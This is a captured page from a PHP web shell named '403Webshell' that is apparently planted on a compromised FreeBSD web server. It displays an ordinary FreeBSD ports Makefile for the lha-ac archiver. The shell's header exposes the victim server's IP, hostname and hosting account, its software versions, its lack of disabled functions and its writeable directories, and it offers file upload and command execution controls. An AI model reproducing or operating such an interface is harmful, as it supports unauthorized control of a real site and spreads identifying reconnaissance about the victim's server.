403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/archivers/lha-ac/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/archivers/lha-ac/Makefile
PORTNAME=	lha
PORTVERSION=	1.14i.20211125
CATEGORIES=	archivers
PKGNAMESUFFIX=	-ac

MAINTAINER=	tagattie@FreeBSD.org
COMMENT=	Archive files using LZSS and Huffman compression (.lzh files)
WWW=		https://lha.osdn.jp

# Converted from RESTRICTED
LICENSE=	LHA
LICENSE_NAME=	LHA
LICENSE_TEXT=	No redistribution allowed
LICENSE_PERMS=	auto-accept

USES=		autoreconf cpe
CPE_VENDOR=	tsugio_okamoto

USE_GITHUB=	yes
GH_ACCOUNT=	jca02266
GH_TAGNAME=	release-${PORTVERSION:E}

GNU_CONFIGURE=	yes

TEST_TARGET=	check

PLIST_FILES=	bin/lha-ac \
		man/ja/man1/lha-ac.1.gz \
		man/man1/lha-ac.1.gz

OPTIONS_DEFINE=		NLS
NLS_CONFIGURE_ON=	--enable-multibyte-filename=auto
NLS_CONFIGURE_OFF=	--disable-multibyte-filename

do-install:
	-${MKDIR} ${STAGEDIR}${MANPREFIX}/man/ja/man1
	${INSTALL_PROGRAM} ${WRKSRC}/src/lha ${STAGEDIR}${PREFIX}/bin/lha-ac
	${INSTALL_MAN} ${WRKSRC}/man/lha.1 ${STAGEDIR}${MANPREFIX}/man/man1/lha-ac.1
	${INSTALL_MAN} ${WRKSRC}/man/lha.n ${STAGEDIR}${MANPREFIX}/man/ja/man1/lha-ac.1

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit